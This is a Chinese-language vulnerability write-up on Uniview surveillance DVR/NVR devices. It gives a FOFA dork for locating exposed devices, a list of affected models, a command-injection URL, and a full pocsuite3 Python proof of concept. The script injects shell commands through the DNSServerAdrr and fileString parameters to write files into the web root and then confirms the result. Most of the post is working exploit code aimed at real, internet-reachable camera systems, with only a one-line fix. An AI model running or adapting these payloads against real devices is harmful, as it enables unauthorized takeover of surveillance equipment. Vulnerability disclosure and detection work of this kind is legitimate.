声明
本文内容仅供学习交流使用,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
一、漏洞简介
该漏洞的产生,是由于/Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令。
FOFA Dork:title=="ISC2500-S"
二、影响设备型号
ECR3316_HF ECR3316-HF ECR3308_HF ECR3308-HF ISC3500E ISC3500E ISC3500S ISC3500S ECR3316_HF_E ECR3316-HF-E ECR3308_HF_E ECR3308-HF-E ECR3316_HF_S ECR3316-HF-S ECR3308_HF_S ECR3308-HF-S ISC3500_ET ISC3500-ET ISC3500_EL ISC3500-EL ISC3500_ST ISC3500-ST ISC3500_SL ISC3500-SL ECR2104_HF ECR2104-HF ECR2108_HF ECR2108-HF ISC2500_SP ISC2500-SP ISC2500_EP ISC2500-EP ISC2500_E ISC2500-E ISC2500_S ISC2500-S ISC2500_L ISC2500-L ECR3308_HF_SC ECR3308-HF-SC ECR3316_HF_SC ECR3316-HF-SC ISC3500_LC ISC3500-LC ISC3500_SC ISC3500-SC ISC3500_EC ISC3500-EC ISC5000-E
三、EXP
/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo Norah C.IV > /usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/12.php %23"
该命令执行漏洞,与https://www.cnblogs.com/charon1937/p/14076819.html出自同一批设备,只是漏洞的触发点略有不同。
四、Python脚本
#!/usr/bin/env python3.8
# _*_ coding: utf-8 _*_
import sys
import requests
from pocsuite3.api import POCBase, Output, register_poc, POC_CATEGORY, VUL_TYPE, VULNERABILITY_LEVEL
from libs.Logger import Logger
from pathlib import Path
file_name = Path(__file__).name
path = sys.path[0]
log_path = path + "/" + file_name
class DemoPOC(POCBase):
vulID = 'wooyun-2016-0182299'
version = '1'
author = ['hy']
vulDate = '2016-06-09'
createDate = '2020-11-23'
updateDate = '2020-11-23'
references = ['https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0182299']
name = '浙江宇视科技监控设备命令执行'
appPowerLink = 'http://www.uniview.com/'
appName = 'uniview'
appVersion = '''
ECR3316_HF、ECR3316-HF、ECR3308_HF、ECR3308-HF、ISC3500E、ISC3500E、ISC3500S、ISC3500S、ECR3316_HF_E、
ECR3316-HF-E、ECR3308_HF_E、ECR3308-HF-E、ECR3316_HF_S、ECR3316-HF-S、ECR3308_HF_S、ECR3308-HF-S、ISC3500_ET、
ISC3500-ET、ISC3500_EL、ISC3500-EL、ISC3500_ST、ISC3500-ST、ISC3500_SL、ISC3500-SL、ECR2104_HF、ECR2104-HF、ECR2108_HF、
ECR2108-HF、ISC2500_SP、ISC2500-SP、ISC2500_EP、ISC2500-EP、ISC2500_E、ISC2500-E、ISC2500_S、ISC2500-S、ISC2500_L、
ISC2500-L、ECR3308_HF_SC、ECR3308-HF-SC、ECR3316_HF_SC、ECR3316-HF-SC、ISC3500_LC、ISC3500-LC、ISC3500_SC、ISC3500-SC、
ISC3500_EC、ISC3500-EC、ISC5000-E'''
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
1.浙江宇视科技uniview视频监控系统/Interface/DevManage/VM.php页面DNSServerAdrr参数过滤不严,导致可以构造恶意的代码,执行系统命令。
2./Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令'''
samples = ['']
install_requires = ['']
category = POC_CATEGORY.TOOLS.CRACK
protocol = POC_CATEGORY.PROTOCOL.SOCKET
vulnerability_level = VULNERABILITY_LEVEL.SERIOUS # 漏洞等级
repair_opinion = '''联系厂商,升级应用的版本。厂商链接:https://cn.uniview.com/'''
def _verify(self):
result = {}
host = self.getg_option("rhost")
port = self.getg_option("rport") or 80
nvr_dvr_flag = False
log_report_flag = False
if camera_uniview_dvr_rce(host, port, nvr_dvr_flag, log_report_flag):
result['VerifyInfo'] = {}
result['VerifyInfo']['HOST'] = host
result['VerifyInfo']['Port'] = port
Logger.info('{}:{}存在浙江宇视科技监控设备命令执行漏洞'.format(host, port), log_path)
return self.parse_attack(result)
else:
Logger.info('{}:{}不存在浙江宇视科技监控设备命令执行漏洞'.format(host, port), log_path)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def camera_uniview_dvr_rce(host, port, nvr_dvr_flag, log_report_flag):
Logger.debug('正在检测{}:{}是否存在浙江宇视科技安防(DVR/NVR)等监控设备命令执行漏洞'.format(host, port), log_path)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) "
"Version/5.1 Safari/534.50"
}
nvr_dvr_payload = '/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" |echo "81dc9bdb52d04dc20036dbd831'
'3ed055" >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/hit.txt %23"'
nvr_dvr_vulnurl = 'http://' + host + ':' + str(port) + nvr_dvr_payload
try:
requests.get(nvr_dvr_vulnurl, headers=headers, timeout=10, verify=False)
nvr_dvr_cmdurl = 'http://' + host + ':' + str(port) + "/Interface/DevManage/hit.txt"
nvr_dvr_req = requests.get(nvr_dvr_cmdurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in nvr_dvr_req.text:
nvr_dvr_flag = True
else:
pass
except Exception as e:
Logger.error('%s' % e, log_path)
finally:
return log_report_rce(host, port, nvr_dvr_flag, log_report_flag)
def log_report_rce(host, port, nvr_dvr_flag, log_report_flag):
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) "
"Version/5.1 Safari/534.50"
}
try:
log_report_payload = '/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo%20Norah%20C.'
'IV%20 >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/12.php%20%23"'
log_report_vulnurl = 'http://' + host + ':' + str(port) + log_report_payload
Logger.debug('正在检测{}:{}是否存在浙江宇视科技 /Interface/LogReport/LogReport.php 命令执行漏洞'.format(host, port),
log_path)
requests.get(log_report_vulnurl, headers=headers, timeout=10, verify=False)
log_report_cmdurl = 'http://' + host + ':' + str(port) + "/Interface/DevManage/12.php"
log_report_req = requests.get(log_report_cmdurl, headers=headers, timeout=10, verify=False)
if r"Norah C.IV" in log_report_req.text:
log_report_flag = True
else:
pass
except Exception as e:
Logger.error('%s' % e, log_path)
finally:
return check_vuln(nvr_dvr_flag, log_report_flag)
def check_vuln(nvr_dvr_flag, log_report_flag):
if nvr_dvr_flag or log_report_flag:
return True
else:
return False
register_poc(DemoPOC)
此为本人及所在安全实验室,结合pocsuite3框架,并对框架进行二次开发后,编写完成的符合自身所需的POC脚本。无法直接对项目进行漏洞检测,若有需要,可提取POC脚本中关键代码。
五、修复意见
升级版本
六、参考文献
https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=1823